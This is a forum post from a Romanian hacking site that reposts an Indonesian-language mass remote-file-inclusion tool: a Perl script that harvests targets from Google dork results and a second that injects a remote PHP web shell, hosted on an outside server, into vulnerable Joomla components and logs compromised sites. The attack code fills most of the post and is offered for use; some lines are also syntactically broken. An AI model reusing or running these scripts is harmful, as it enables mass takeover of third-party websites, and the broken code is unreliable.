www.Hacking-Romania.com
Hacking, gaby hacker team, programe hack, radmin hack, hi5 hack, hack the west, hacking romania, hacking stuff, hacking tools, 1 hack, 1st hacks, 2 hack, 2 hacks, 3 hack, 3 hacks, 3000 hack, 3004 hack, 4 hack, 4 hacks, 55 hack, 6 hack, 6 hacks, 7 hack, 7 hacks, 9 hack, 9dragons hack, a hack, adventure quest hack, aim hack, alz hack, and hacks, best hack, blue hack, bots hack, bots hacks, buy hack, cabal online hack, chaos hacks, cheat engine hack, cheat hack, cheats and hacks, cheats hacks, city hack, club hack, combo hack, conquer hacks, conquer online hack, conquer online hacks, conquer speed hack, conquiztador hack, counter strike 1.6 hack, damage hack, de hack, download hack, download hack for, dragonfable hack, dragonfable hacks, drakkarious hack, exp hack, flyff hack, free hack, free hacks, game hack, game hacks, garena exp hack, gladiatus hack, gm hack, gold hack, gunz hack, hack, hack 5, hack a pc, hack a site, hack a website, hack blog, hack conquer, hack counter strike, hack crack, hack cs, hack cs 1.6, hack dvd, hack email, hack forum, hack hunter, hack id, hack info, hack it, hack mess, hack muonline, hack net, hack password, hack passwords, hack pc, hack pdf, hack programs, hack site, hack sites, hack soft, hack software, hack team, hack the game, hack this, hack website, hack windows xp, hack world, hack xp, hacked, hacking, hacking game, hacking programs, hacking software, hacking tutorials, hacks, how hack, how to hack, icon hack, last chaos hack, last chaos hacks, life hack, lineage 2 hack, lineage 2 hacks, linux hack, lvl hack, maplestory hacks, mobile hack, multi hack 3.0, mybrute hack, naruto arena hack, naruto arena hacks, one hit kill hack, online hacks, perfect world hacks, pool hack, programe hack, resolution hack, resource hack, roll hack, royal hack, silkroad hack, source hack, speed hack, speed hacks, super hack, the west hack, warrock hack, warrock hacks, web hack, xpango hack, lockerz forum 		Lista Forumurilor Pe Tematici
www.Hacking-Romania.com | Reguli | Inregistrare | Login

POZE WWW.HACKING-ROMANIA.COM

Nu sunteti logat. 		Nou pe simpatie:
Elena01 la Simpatie.ro
Femeie
23 ani
Braila
cauta Barbat
23 - 35 ani
www.Hacking-Romania.com / Hacking T00ls / Google Mass Remote File Inclussion Scanner  
Autor
Mesaj Pagini: 1
biker_alex2
MEMBRU SPECIAL

Inregistrat: acum 16 ani
Postari: 435
Google Mass Remote File Inclussion Scanner
-------------------------------------------
By : LoneEagle


    Gw hanya bisa geleng - geleng kepala dengan banyaknya advisories
Remote file inclussion baik di securityfocus atau milw0rm, ga terasa
advisories security hanya layaknya mainan anak kecil yang malas
menganalisa code, terbukti dengan banyaknya advisories yang isinya
hanya google dork : "blablabla", what kind of lamme advisories!!

    Ahh, gw ga peduli dengan semua itu gw cuma mo share google mass
RFI scanner dari pada nyari bug di CMS (kan uda banyak yang nyari )
Cara pakenya sederhana aja
1. Siapin r57shell sebagai phpshell untuk inject
2. perl lwpgoogle.pl <dork>
3. perl massinject.pl <file_output_lwpgoogle>


=========================== lwpgoogle.pl ==============================


#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm

print "Grabbing website through google\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0]){
  print "Usage #perl $0 <dork>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

$proxy='http://140.247.60.123:8888/';
$dork=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows";
$ua->proxy(http => $proxy) if defined($proxy);
$counter=0;
print "Pencarian menggunakan kata kunci : $dork\n";
$hasil="";
while($hasilx !~ /hasil penyajian/)
{
  $googleurl="http://www.google.co.id/search?q=$dork&hl=id&lr=&start=$a&sa=N";
  $grabresponse = $ua->get($googleurl);
  $counter=$counter+10;
  if (!($grabresponse->is_success)) {
  print ($grabresponse->status_line. "  Failure\n";
  } else {
    @hasil = $grabresponse->as_string;
    $hasilx="@hasil";
    sleep 1;
    #print "$hasilx";
    if($hasilx =~ /tak cocok/)
    {
      print "Ga ada hasil boz\n";
      exit;
    }

    while($hasilx =~ m/<a class=l href=".*?" on.*?<\/a>/)
    {
      $hasilx =~ s/<a class=l href="(.*?)" on.*?<\/a>/$1/;
      $hell = $1;
      print "$hell\n";
      open(f,">>google_log.txt";
      print f "$hell\n";
      close(f);
    }
    $a+=10;
  }
}
print "\nSilakan liat hasilnya di google_log.txt\n";


============================ massinject.pl ===============================

#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm
#http://www.tizag.com/perlT/perlarrays.php

print "Mass Remote File Inclussion\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0])
{
  print "Usage #$0 <google_file>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

#KONFIGURASI MASS INJECTION
#DEFINISI VULNERABILITY (TAMBAIH DEWEK YOHH!!)
$vuln="components/com_calendar.php?absolute_path=";
#$vuln="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
#$vuln="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
#$vuln="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
#DAN LAINNYA TAMBAH NDIRI
#DEFINISI EVIL HTTP PHPSHELL
$phpshell="http://cenzurat.com/audit/mylocalakses/phpshell.txt?";
#AKHIR KONFIGURASI

$proxy='http://172.20.2.1:3128/';
$google_f=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows";
$ua->proxy(http => $proxy) if defined($proxy);

open(ff,$google_f);
@myurl=<ff>;
close(ff);

for($a=0;$a<$#myurl;$a++)
{
  $myurl[$a] =~ m/(http:\/\/.*?\/)index.php/;
  if($1 !~ //)
  {
    $gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    print "Processing $gourl ...\n";
    $browse = $ua->get($gourl);
    if(!($browse->is_success)) {
      print($browse->status_line. "  Failure\n";
    } elsif(($browse->is_success)) {
      @hasil = $browse->as_string;
      $hasilx = "@hasil";
      if($hasilx =~ /http:\/\/undeva.void.ru\/download\/r57shell.txt/){
        print("  VULNERABLE..[OK]\n";
        open(f,">>vulnlog.txt";
        print f "$gourl\n";
        close(f);
      } else {
        print "Not Vulnerable\n";
      }
    }
  }
}

print "Finish RFI mass injecting, see result in vulnlog.txt file\n";


============================== EOF =================================
pus acum 16 ani
   
Pagini: 1  

Mergi la